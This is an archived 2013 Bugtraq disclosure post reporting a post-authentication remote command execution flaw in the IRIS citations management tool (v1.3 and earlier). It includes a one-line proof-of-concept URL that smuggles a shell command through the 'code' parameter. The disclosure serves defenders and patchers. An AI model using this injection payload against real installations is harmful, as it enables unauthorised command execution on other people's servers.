| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201302092111.r19LBOGT022065@sf01web3.securityfocus.com> Date: Sat, 9 Feb 2013 21:11:24 GMT From: aeon.s.flux@...il.com To: bugtraq@...urityfocus.com Subject: I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands. Details can be found on my blog: https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/ PoC: http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||" ~ aeon
Powered by blists - more mailing lists